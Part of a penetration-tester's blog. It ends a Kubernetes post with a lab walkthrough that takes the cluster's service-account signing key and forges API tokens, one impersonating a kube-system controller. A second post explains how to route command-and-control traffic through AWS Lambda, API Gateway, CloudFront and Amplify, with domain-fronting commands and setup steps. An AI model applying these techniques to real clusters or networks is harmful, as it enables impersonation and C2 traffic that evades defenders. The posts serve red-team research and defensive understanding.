<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ sudo cp /etc/kubernetes/pki/sa.key .
(crypto) stephen@kubemaster:~/certs$ sudo chown stephen:stephen sa.key
(crypto) stephen@kubemaster:~/certs$ openssl rsa -in sa.key -pubout -out sa.pub
writing RSA key
(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -key sa.pub -verify token
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "nginx-app-5777b5f95-97489",
"uid": "52a7105a-fcff-49c2-9759-1815bd078fd7"
},
"serviceaccount": {
"name": "default",
"uid": "dfa13ceb-5160-4a1a-9803-049e4873a609"
},
"warnafter": 1700032573
},
"nbf": 1700028966,
"sub": "system:serviceaccount:default:default"
}
</code></pre></div></div>
<p>OK, this output of the claims data from the JWT means we have found the correct key.</p>
<h2 id="creating-our-own-tokens">Creating our own tokens</h2>
<p>Let’s write the claims data from the previous output to a file so we have something to work with.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -key sa.pub -verify token > claims
(crypto) stephen@kubemaster:~/certs$ cat claims
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "default",
"pod": {
"name": "nginx-app-5777b5f95-97489",
"uid": "52a7105a-fcff-49c2-9759-1815bd078fd7"
},
"serviceaccount": {
"name": "default",
"uid": "dfa13ceb-5160-4a1a-9803-049e4873a609"
},
"warnafter": 1700032573
},
"nbf": 1700028966,
"sub": "system:serviceaccount:default:default"
}
</code></pre></div></div>
<p>Now let’s try and create our own token using these claims and test it using curl to confim we have a working signing process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -header 'kid=SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI' -key sa.key -sign claims >forged_token
(crypto) stephen@kubemaster:~/certs$ curl --cacert ca.crt -H "Authorization: Bearer $(cat forged_token)" https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>Success! This at proves we have a working key and our method of generating tokens is compatible. However, all we have done so far is just recreate the existing token we already had, filling in details by just copying details verbatim. What if we want to forge arbitrary tokens??</p>
<p>First, how can we derive the kid to use from the public key. (This is not necessary in this case as only one key is in use in the system and we can just exclude the <code class="language-plaintext highlighter-rouge">kid</code> field from the JWT header and still have it work, but we can do it for completeness and to provide another way to identify keys).</p>
<p>This value is actually the sha256 hash of the DER format of the public key, URL-safe base64 encoded. Here it is using the command line</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ openssl rsa -pubin -outform der -in sa.pub 2>/dev/null | openssl sha256 -binary | basenc --base64url | sed --expression 's/=//g'
SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI
</code></pre></div></div>
<p>Let’s play with the claims data to get it down to a more minimal form so we are not wasting our time reproducing extra data we dont need. By trial and error this is the minimised version of whats needed in the claims section of the JWT that I came up with.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ cat claimsmod
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "default",
"serviceaccount": {
"name": "default",
"uid": "dfa13ceb-5160-4a1a-9803-049e4873a609"
}
},
"nbf": 1700028966,
"sub": "system:serviceaccount:default:default"
}
(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -header 'kid=SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI' -key sa.key -sign claimsmod >forged_token2
(crypto) stephen@kubemaster:~/certs$ curl --cacert ca.crt -H "Authorization: Bearer $(cat forged_token2)" https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">exp</code> (expiry), <code class="language-plaintext highlighter-rouge">iat</code> (issued at) and <code class="language-plaintext highlighter-rouge">nbf</code> (not before) in the sample above are all epoch timestamps and represent the time period within which the generated token will be valid. I didnt need to change these for this example but once the current time is past the <code class="language-plaintext highlighter-rouge">exp</code> value you will need to update these for the tokens to be valid. Once this is required you can generate a timestamp for the current time like so for <code class="language-plaintext highlighter-rouge">iat</code> and <code class="language-plaintext highlighter-rouge">nbf</code> and then add a big number to it (in this example its 31536000) for <code class="language-plaintext highlighter-rouge">exp</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ date +%s
1700045771
</code></pre></div></div>
<p>Now that our claims data is minimised what if we want to create a token for a different service account? Here are the accounts in the system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get sa --all-namespaces
NAMESPACE NAME SECRETS AGE
default default 0 7d7h
kube-node-lease default 0 7d7h
kube-public default 0 7d7h
kube-system attachdetach-controller 0 7d7h
kube-system bootstrap-signer 0 7d7h
kube-system calico-kube-controllers 0 7d7h
kube-system calico-node 0 7d7h
kube-system certificate-controller 0 7d7h
kube-system clusterrole-aggregation-controller 0 7d7h
kube-system coredns 0 7d7h
kube-system cronjob-controller 0 7d7h
kube-system daemon-set-controller 0 7d7h
kube-system default 0 7d7h
kube-system deployment-controller 0 7d7h
kube-system disruption-controller 0 7d7h
kube-system endpoint-controller 0 7d7h
kube-system endpointslice-controller 0 7d7h
kube-system endpointslicemirroring-controller 0 7d7h
kube-system ephemeral-volume-controller 0 7d7h
kube-system expand-controller 0 7d7h
kube-system generic-garbage-collector 0 7d7h
kube-system horizontal-pod-autoscaler 0 7d7h
kube-system job-controller 0 7d7h
kube-system kube-proxy 0 7d7h
kube-system namespace-controller 0 7d7h
kube-system node-controller 0 7d7h
kube-system persistent-volume-binder 0 7d7h
kube-system pod-garbage-collector 0 7d7h
kube-system pv-protection-controller 0 7d7h
kube-system pvc-protection-controller 0 7d7h
kube-system replicaset-controller 0 7d7h
kube-system replication-controller 0 7d7h
kube-system resourcequota-controller 0 7d7h
kube-system root-ca-cert-publisher 0 7d7h
kube-system service-account-controller 0 7d7h
kube-system service-controller 0 7d7h
kube-system statefulset-controller 0 7d7h
kube-system token-cleaner 0 7d7h
kube-system ttl-after-finished-controller 0 7d7h
kube-system ttl-controller 0 7d7h
</code></pre></div></div>
<p>Let’s try and impersonate the <code class="language-plaintext highlighter-rouge">service-account-controller</code> account. To successfully modify the basic claims template to work for this account we need to know the account name (<code class="language-plaintext highlighter-rouge">service-account-controller</code>) the namespace (<code class="language-plaintext highlighter-rouge">kube-system</code> from the output above) and the uid.</p>
<p>The uid is the only value we dont have, but we can get this from the API in a number of ways, including the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ kubectl get sa service-account-controller -n kube-system -o jsonpath='{.metadata.uid}'
2eb4a3d0-9756-4d13-ab07-69a062998a26
</code></pre></div></div>
<p>The new claims data with the previously mentioned values inserted looks like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ cat claimssc
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1731564966,
"iat": 1700028966,
"iss": "https://kubernetes.default.svc.cluster.local",
"kubernetes.io": {
"namespace": "kube-system",
"serviceaccount": {
"name": "service-account-controller",
"uid": "2eb4a3d0-9756-4d13-ab07-69a062998a26"
}
},
"nbf": 1700028966,
"sub": "system:serviceaccount:kube-system:service-account-controller"
}
</code></pre></div></div>
<p>Now let’s create a new token and test it against the API:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(crypto) stephen@kubemaster:~/certs$ jwt -alg RS256 -header 'kid=SMTTEHsg9Z1qSYg7zwxge6Op73XuEdv1c_ApQ0AXzDI' -key sa.key -sign claimssc >forged_token3
(crypto) stephen@kubemaster:~/certs$ curl --cacert ca.crt -H "Authorization: Bearer $(cat forged_token3)" https://kubemaster.thezoo.local:6443/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.10.123:6443"
}
]
}
</code></pre></div></div>
<p>Success!</p>
<p>Also, if you’d prefer the <a href="https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/master/example_code/crypto_helpers.py">Python helper code</a> referenced in the previous section on user certificates also includes functions to help performing the JWT analysis and creation that we just did from the command line.</p>Stephen BradshawIn this post Im going to do a deep dive into two of the most commonly used authentication mechanisms for Kubernetes.AWS Service Command and Control HTTP traffic forwarding2023-08-30T07:04:00+00:002023-08-30T07:04:00+00:00/2023/08/30/aws-service-C2-forwarding<p>Recently I’ve been looking into options for abusing AWS services to forward HTTP Command and Control (C2) traffic. This post will talk about a number of approaches for this I found discussed on the Internet as well as a few options that I identified myself.</p>
<p>For those not familiar with how most modern C2 systems work, an overview of their operation might be helpful. Skip ahead a paragraph if you are already familiar with the way C2 systems are designed.</p>
<p>A Command and Control system provides an interface by which commands can be run on already compromised computers in order for attackers to achieve their goals. Specific terms vary, but C2 architecture normally consists of implants that run on compromised devices and run commands, interfaces that attackers can use to issue commands to be run on compromised devices, and servers that coordinate communications between the two. The C2 server normally sits in a location reachable from the Internet, so victim systems with the C2 implant installed can communicate back to the server to ask for instructions. Depending on the C2 software in question, there will be one or more protocols supported for this purpose. The protocols chosen are repurposed, in that they were originally designed and used for some other benign purpose. This repurposing is done deliberitely in order to make the C2 implant communications blend in to normal network traffic. The most commonly supported protocol for implant to server communication in modern C2 systems is HTTP/S.</p>
<p>The use of HTTP/S by C2 is not the only way this protocol is abused for malicious activity, so defenders are paying attention. One approach to try and identify abuse of the protocol is to check the “reputation” of HTTP/S traffic destinations using a source like <a href="https://urlfiltering.paloaltonetworks.com/query/">this</a> (other sources are available). By making use of AWS services that can proxy HTTP traffic, the operator of a C2 server can take advantage of the comparitively “good” reputation of the URLs associated with those AWS services to try and avoid detection. So, my question was, what AWS services can be used in this manner?</p>
<h1 id="previous-work">Previous work</h1>
<p>I started off this exercise by looking for existing writeups on the topic. I considered out of scope anything that required custom C2 implant communications (e.g. <a href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/listener-infrastructure_external-c2.htm?cshid=1043">External C2</a>). I wanted forwarding of plain old HTTP/S to give me the widest possible range of options in C2 servers that could be put behind this without requiring code changes.</p>
<p>After a few hours of research, I found the following:</p>
<ul>
<li><a href="https://blog.xpnsec.com/aws-lambda-redirector/">This post</a> by Adam Chester which talks about using the <a href="https://serverless.com/">Serverless framework</a> to create an <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> that will receive traffic from the <a href="https://aws.amazon.com/api-gateway/">AWS API Gateway</a> and then forward it to another arbitrary destination. In Adams example, he forwards the traffic using ngrok to a local web server, but this approach could be used point to an EC2 instance in the same AWS account or other server on the Internet.</li>
<li><a href="https://scottctaylor12.github.io/lambda-function-urls.html">This post</a> from Scott Taylor which again uses a Lambda to perform traffic redirection, but this time the entry point is via <a href="https://docs.aws.amazon.com/lambda/latest/dg/lambda-urls.html">Lambda function URLs</a> instead of the API Gateway. There is associated code/instructions to deploy this Lambda to AWS as well as to create an EC2 instance to forward the traffic to.</li>
<li>Many posts on using a <a href="https://aws.amazon.com/cloudfront/">CloudFront distribution</a> and domain fronting to receive traffic from CloudFront sites and send them to a C2 server somewhere else. Some examples are <a href="https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting">this</a>, <a href="https://digi.ninja/blog/cloudfront_example.php">this</a> and <a href="https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/">this</a>. There are a bunch more too. This topic of domain fronting in CloudFront deserves a deeper dive, because things have changed….</li>
</ul>
<h1 id="a-note-on-domain-fronting-and-cloudfront">A note on Domain fronting and CloudFront</h1>
<p>Something that you will see repeated endlessly if you search on this topic is that you can use the CloudFront Content Delivery Network (CDN) to perform domain fronting for C2 services.</p>
<p>Domain fronting is a technique that attempts to hide the true destination of a HTTP request or redirect traffic to possibly restricted locations by abusing the HTTP routing capabilities of CDNs or certain other complex network environments. For version 1.1 of the protocol, HTTP involves a TCP connection being made to a destination server on a given IP address (normally associated with a domain name) and port, with additional TLS/SSL encryption support for the connection in HTTPS. Over this connection a structured plain text message is sent that requests a given resource and references a server in the <code class="language-plaintext highlighter-rouge">Host</code> header. Under normal circumstances the domain name associated with the TCP connection and the <code class="language-plaintext highlighter-rouge">Host</code> header in the HTTP message match. In domain fronting, the destination for the TCP connection domain name is set to a site that you want to appear to be visiting, and the <code class="language-plaintext highlighter-rouge">Host</code> header in the HTTP request is set to the location you actually want to visit. Both locations must be served by the same CDN.</p>
<p>The following curl command demonstrates in the simplest possible way how the approach is performed in suited environments. In the example, <code class="language-plaintext highlighter-rouge">http://fakesite.cloudfront.net/</code> is what you want to <strong>appear</strong> to be visiting, and <code class="language-plaintext highlighter-rouge">http://actualsite.cloudfront.net</code> is where you actually want to go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl -H 'Host: actualsite.cloudfront.net' http://fakesite.cloudfront.net/
</code></pre></div></div>
<p>In this example, any DNS requests resolved on the client site are resolving the “fake” address, and packet captures will show the TCP traffic going to that fake systems IP address. If HTTPS is supported, and you use a <code class="language-plaintext highlighter-rouge">https://</code> URL, the actual destination you are visiting located in the HTTP <code class="language-plaintext highlighter-rouge">Host</code> header will also be hidden in the encrypted tunnel.</p>
<p>While this <strong>is</strong> a great way of hiding C2 traffic, due to a widespread practice of domain fronting being used to evade censorship restrictions, various CDNs did crack down on the approach a few years ago. Some changes were rolled back in some cases, but as at the time of this writing this simple approach to domain fronting <strong>does not work</strong> in CloudFront for HTTPS. If the DNS hostname that you connect to does not match any of the certificates you have associated with your CloudFront distribution, you will get the following error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The distribution does not match the certificate for which the HTTPS connection was established with.
</code></pre></div></div>
<p>This applies only to HTTPS - HTTP still works using the approach shown in the example above. However, given the fact that HTTP has the <code class="language-plaintext highlighter-rouge">Host</code> header value exposed in the clear in network traffic this leaves something to be desired when the purpose is hiding where you’re going. Depending on the capability of inspection devices, it might be good enough for certain purposes however.</p>
<p>It is possible to make HTTPS domain fronting work on CloudFront via use of Server Name Indication <a href="https://www.cloudflare.com/en-gb/learning/ssl/what-is-sni/">(SNI)</a> to specify a Server Name value during the TLS negotiation that matches a certificate in your Cloudfront distribution. In other words, you TCP connect via HTTPS to a fake site on the CDN and set the SNI servername for the TLS negotation <strong>AND</strong> the HTTP <code class="language-plaintext highlighter-rouge">Host</code> to your actual intended host.</p>
<p>Heres how this connection looks using openssl.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl s_client -quiet -connect fakesite.cloudfront.net:443 -servername actualsite.cloudfront.net < request.txt
depth=2 C = US, O = Amazon, CN = Amazon Root CA 1
verify return:1
depth=1 C = US, O = Amazon, CN = Amazon RSA 2048 M01
verify return:1
depth=0 CN = *.cloudfront.net
verify return:1
</code></pre></div></div>
<p>Where file <code class="language-plaintext highlighter-rouge">request.txt</code> contains something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET / HTTP/1.1
Host: actualsite.cloudfront.net
</code></pre></div></div>
<p>Unfortunately, I’m not aware of any C2 implant that supports specifying the TLS servername in a manner similar to what is shown above, so C2 HTTPS domain fronting using CloudFront is not a viable approach until this time. However, this does not mean that CloudFront is completely unusable for C2. As already mentioned, you can do domain fronting via HTTP. Its also possible to access the distribution via HTTPS using the <code class="language-plaintext highlighter-rouge"><name>.cloudfront.net</code> name that is created randomly for you when you setup your distribution. This domain does have a good trust profile in some URL categorisation databases.</p>
<h1 id="summary-of-identified-approaches">Summary of identified approaches</h1>
<p>With that diversion out of the way, lets look at the complete list of options I identified for forwarding HTTP traffic using AWS services.</p>
<p>Heres the list, including the afore mentioned approaches I found discussed elsewhere on the Internet, and a few more I identified myself:</p>
<ul>
<li><strong>Function URLs execute an AWS Lambda that forwards HTTP requests and responses</strong>. In this approach, requests enter the AWS account via the Function URL HTTP endpoint and are handled by an AWS Lambda. This Lambda forwards requests and responses between the implant and a backend server of your choice. The backend server can be an EC2 instance in the same AWS account, or any other HTTP/S service that the Lambda can reach, including servers accessible on the Internet. This is the <a href="https://scottctaylor12.github.io/lambda-function-urls.html">approach from Scott Taylor</a> as mentioned above.</li>
<li><strong>The API gateway executing an AWS Lambda that forwards HTTP requests and responses</strong>. In this approach, requests enter the AWS account via the API gateway HTTP endpoint, and are handled by an instance of the AWS Lambda. <a href="https://blog.xpnsec.com/aws-lambda-redirector/">This approach</a> originally from Adam Chester is functionally very similar to the afore mentioned Function URL approach, with the only differences being the entry point into the AWS account and the setup. Even though Adam and Scott had different Lambda functions in each of their blog posts I found it was possible to use <a href="https://github.com/scottctaylor12/Red-Lambda/blob/main/lambda.py">Scott’s function</a> for both approaches. It is even possible to configure the same Lambda function instance to handle incoming requests from both a Function URL endpoint and one or more API Gateway endpoints at the same time. There are some differences in how the entrypoints have to be used depending on what type of API gateway is used and how its configured, that will be discussed below.</li>
<li><strong>CloudFront distribution forwarding to a back end service</strong>. In this approach, requests enter the AWS account via CloudFront, and can be forwarded to various backends, such as an AWS load balancer or Internet accessible URL. Theres lots of online resources talking about how to set this up so I wont be going into a great deal of detail about it here, but be aware that some references are out of date when it comes to the domain fronting point that I’ve discussed above.</li>
<li><strong>API gateway direct proxying</strong>. In this approach, instead of taking requests from the API Gateway and sending them to a Lambda, you instead proxy them directly to a private resource or other URL. The private resource can be a <a href="https://aws.amazon.com/cloud-map/">Cloudmap</a> service (that you can point to an EC2 instance and port), an AWS Application Load Balancer <a href="https://docs.aws.amazon.com/elasticloadbalancing/latest/application/introduction.html">(ALB)</a> or a Network Load Balancer <a href="https://docs.aws.amazon.com/elasticloadbalancing/latest/network/introduction.html">(NLB)</a> and allows the traffic to be forwarded within the AWS account without transiting the Internet. The HTTP URI option allows forwarding to another Internet accessible URL.</li>
<li><strong>AWS Amplify application</strong>. In this approach, an Amplify application acts as a proxy to forward traffic to another Internet accessible location - such as an existing CloudFront distribution. An <a href="https://aws.amazon.com/amplify/">Amplify app</a> provides an easy way to quickly generate a web application that will be hosted on an auto generated domain name delivered through CloudFront at the <code class="language-plaintext highlighter-rouge">*.amplifyapp.com</code> domain.</li>
</ul>
<p>Out of these, my favorite approach is the API Gateway proxying method. In a coming section, I’ll talk at a high level about how to implement each of these approaches, as well as some of the more relevant details for C2 forwarding that apply. First however, given that its referenced in two of the above options I want to go over the relevant differences between the two API Gateway types for C2 forwarding.</p>
<h1 id="api-gateway-rest-vs-http">API Gateway: REST vs HTTP</h1>
<p>The API gateway offers two main types of API - REST and HTTP. The API documentation provides a lot of information on choosing between these two types of gateway starting <a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html">here</a>, but from our perspective of fronting C2 traffic the important points are as follows:</p>
<ul>
<li>The entry point URLs look the same for REST and HTTP types and fit the pattern of <code class="language-plaintext highlighter-rouge">https://<random_10_chr_str>.execute-api.<region>.amazonaws.com/<path></code>.</li>
<li>It is possible to perform domain fronting with HTTPS with another API gateway instance in the same region and of the same type (e.g. HTTP or REST).</li>
<li>Both types can be used to forward to a Lambda or to a HTTP URI or various other AWS services, although the integration of API stage names in entry point URLs can complicate how well this works for C2 as discussed in the next point.</li>
<li>The HTTP type is the only type that I have been able to configure to proxy services to a bare URI. The REST type requires that the <code class="language-plaintext highlighter-rouge">stage</code> be included at the start of the URI path. For example a REST API entrypoint would look like this <code class="language-plaintext highlighter-rouge">https://<rest-api>.execute-api.<region>.amazonaws.com/stage_name/</code>, whereas a HTTP one could look like this <code class="language-plaintext highlighter-rouge">https://<http-api>.execute-api.<region>.amazonaws.com/</code>. Some C2 servers can deal with additional path information in the URL without a problem although this does make certain proxying configurations more complex for REST types.</li>
</ul>
<p>Due to last point alone my preference is to use HTTP API gateway types instead of REST ones for C2 forwarding, whether via Lambda or direct proxying, and this is the implementation approach I recommend below in cases where the API gateway is used. This also means that my suggested method for implementing the API Gateway<->Lambda forwarder is different than the Serverless approach discussed in <a href="https://blog.xpnsec.com/aws-lambda-redirector/">Adam’s post</a>. I think this difference in approach here is largely due to the rapid increase in functionality of AWS services over time - I don’t believe the HTTP API Gateway type was available back when Adam originally wrote his post.</p>
<h1 id="overview-and-implementation">Overview and implementation</h1>
<p>The following are instructions on how to implement each of the afore mentioned C2 forwarding approaches and a summary of some of their relevant distinguishing features. The assumption I have made with the instructions is that the destination C2 server sits within the same AWS account as the AWS forwarding service being configured, and that you are following a minimal access permission model in your account. I havent made any specific assumptions about the rest of the C2 design in your network, although my design involved an additional reverse HTTP proxy that handled all implant HTTP traffic destined for the C2 box. In cases where I refer to en EC2 instance receiving HTTP/S from the AWS service forwarder - this was the box being referred to. If theres interest, I can do a seperate post on this design, but for the purpose of this post Ive tried to keep the instructions generic.</p>
<p>The instructions are fairly bare bones, listing the minimal configuration settings you need to set to make the service functional, and assume you have fairly decent knowldge of how AWS networking, IAM and security groups work. You might need to refer to the AWS documentation for specific services to find where a particular referenced setting is set. These are the manual click-ops steps, but if you want to rapidly deploy and tear down your infrastructure you will obviously want to implement these steps in an Infrastructure as Code format.</p>
<h2 id="function-url-to-lambda">Function URL to Lambda</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<random_32_char_value>.lambda-url.<aws_region>.on.aws</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on Function URL creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Computer and Internet Info</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header manipulation for HTTP and HTTPS for arbitrary values within the same region matching pattern <code class="language-plaintext highlighter-rouge">*.lambda-url.<aws_region>.on.aws</code></li>
</ul>
<p><strong>Setup</strong></p>
<p><a href="https://scottctaylor12.github.io/lambda-function-urls.html">Scott’s blog post</a> and associated <a href="https://github.com/scottctaylor12/Red-Lambda">Red Lambda Github repository</a> provide some instructions and CloudFormation code to implement a Lambda/Function URL forwarder and C2 system, but if your design is different its helpful to know know to do the Function URL and Lambda setup manually.</p>
<ol>
<li>
<p>Take the <a href="https://github.com/scottctaylor12/Red-Lambda/blob/main/lambda.py">Lambda code from Scotts repository</a>. Depending on when you follow these instructions, you can also use [my fork instead]((https://github.com/stephenbradshaw/Red-Lambda/blob/main/lambda.py), thats awaiting PR acceptance into Scott’s repository and fixes an issue with proper forwarding of binary responses from the backend C2 server.</p>
</li>
<li>
<p>Create a new Lambda using the Python 3.7 runtime (later versions will not work due to issues with the Python requests module).</p>
</li>
<li>
<p>The handler for the Lambda should be set to <code class="language-plaintext highlighter-rouge">lambda_function.redirector</code> assuming a code filename of <code class="language-plaintext highlighter-rouge">lambda_function.py</code>.</p>
</li>
<li>
<p>Set an environment variable of <code class="language-plaintext highlighter-rouge">TEAMSERVER</code> to point to the private IP address or name of the HTTPS capable service you want to redirect to.</p>
</li>
<li>
<p>Associate the appropriate VPC and subnet with the Lambda (these should match the VPC and subnet of the destination EC2 instance) and create a dedicated security group for the Lambda.</p>
</li>
<li>
<p>Add a security rule to the Security Group for the destination EC2 instance that allows HTTPS from the security group associated with the Lambda.</p>
</li>
<li>
<p>When creating the Lambda, choose to associate a Function URL with it.</p>
</li>
<li>
<p>The Lambda execution role should be a custom IAM role with the <code class="language-plaintext highlighter-rouge">AWSLambdaExecute</code> managed policy AND the following custom policy attached.</p>
</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "LambdaRedir",
"Effect": "Allow",
"Action": [
"ec2:CreateNetworkInterface",
"ec2:DeleteNetworkInterface",
"ec2:DescribeInstances",
"ec2:AttachNetworkInterface",
"ec2:DescribeNetworkInterfaces"
],
"Resource": "*"
}
]
}
</code></pre></div></div>
<p>An auto generated Function URL address will be provided in the console once configuration is complete.</p>
<h2 id="api-gateway-to-lambda">API Gateway to Lambda</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on API Gateway creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Computer and Internet Info</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header manipulation for HTTP and HTTPS for valid API Gateway domains in the same region and of the same type (REST or HTTP)</li>
</ul>
<p><strong>Setup</strong></p>
<p>As mentioned in the <a href="#api-gateway-rest-vs-http">API Gateway</a> section above, I prefer using the HTTP API Gateway type as opposed to the REST type, so my setup approach is different to the way that API Gateway/Lambda forwarding was setup in <a href="https://blog.xpnsec.com/aws-lambda-redirector/">Adam’s blog post</a>.</p>
<p>The setup is pretty straightforward.</p>
<ol>
<li>
<p>Setup a forwarder Lambda as described in the section above. This Lambda code works with both Function URL and API Gateway triggers. Given you are using API Gateway forwarding you can skip the step where you enable a Function URL if you like or leave it if you want both entrypoints enabled.</p>
</li>
<li>
<p>Create a <code class="language-plaintext highlighter-rouge">HTTP</code> API Gateway instance.</p>
</li>
<li>
<p>Create a <code class="language-plaintext highlighter-rouge">/{proxy+}</code> resource for the <code class="language-plaintext highlighter-rouge">ANY</code> method.</p>
</li>
<li>
<p>Add an AWS Lambda integration, pick the region where your Lambda resides and the Lambda name. There will be an option <code class="language-plaintext highlighter-rouge">Grant API Gateway permission to invoke your Lambda function</code> which you can leave selected. No authorizer is required.</p>
</li>
<li>
<p>Create a <code class="language-plaintext highlighter-rouge">$default</code> stage and enable automatic deployment.</p>
</li>
</ol>
<p>The invoke URL will be provided on the summary page for the gateway.</p>
<h2 id="cloudfront-distribution-forwarding">CloudFront distribution forwarding</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<13_character_random_value>.cloudfront.net/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on API Gateway creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Content Delivery Networks</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code> for *cloudfront.net URLS, or domain dependant for custom domains</li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header for HTTP, requires using SNI as part of the TLS session initiation set to the same value as the host header for HTTPS for other valid sites delivered by the CDN</li>
</ul>
<p><strong>Setup</strong></p>
<p>There are dozens of resources on the Internet that describe how to use CloudFront as a forwarder for C2, so I wont go into detail on how to configure it here, you can check one of the many other resources for detail instructions. Amongst those linked above I also used <a href="https://www.blackhillsinfosec.com/using-cloudfront-to-relay-cobalt-strike-traffic/">this</a> as a reference when setting up my POC.</p>
<p>I will provide some general notes and tips I had about the creation process.</p>
<p>Using a CloudFront distribution for C2 fronting requires:</p>
<ul>
<li>An AWS load balancer of some type (ALB, NLB or classic) setup to forward traffic to the destination HTTP/S service (e.g. EC2 instance)</li>
<li>A custom domain and AWS hosted SSL certificate <strong>IF</strong> use of a custom domain is desired</li>
</ul>
<p>Each of the different load balancer options has different characteristics that might influence the right option to choose depending on the environment.</p>
<ul>
<li>The ALB requires that you specify at least two subnets in different availability zones as traffic destinations to be selected during setup, so may not be suitable for single AZ setups.</li>
<li>The NLB does a direct pass through of the client IP address to the destination EC2 instance, so does require that Internet access rules be applied in the security group associated with the EC2 instance. To restrict access to only CloudFront origin endpoints (as opposed to the entire Internet) requires in the neighbourhood of 55 rules to be added to the security group. This may require a limit increase in the associated AWS account if many existing rules are already present, as the default maximum rules in a security group is 60.</li>
<li>The Classic Load balancer is considered to be “out of date” technology but does not have any current end of life set and does work reliably. It does not have either of the afore mentioned restrictions, having its own dedicated security group and no requirement for multiple availability zone routing. The main downside is the mandatory health check requests generating unnecessary log entries on the destination HTTP/S service.</li>
</ul>
<p>To setup a classic load balancer add one in the same VPC as the destination EC2 instance, create a dedicated security group and add a rule to allow traffic to port 80 from the managed prefix list <code class="language-plaintext highlighter-rouge">com.amazonaws.global.cloudfront.origin-facing</code> - this allows only traffic from the CloudFront servers to reach the load balancer. The id of the list can be looked up in the Managed prefix lists section of the VPC console in order to add it to the security group - this was <code class="language-plaintext highlighter-rouge">pl-b8a742d1</code> at the time this post was written. The origin in the CloudFront distribution should then be set to forward traffic using HTTP.</p>
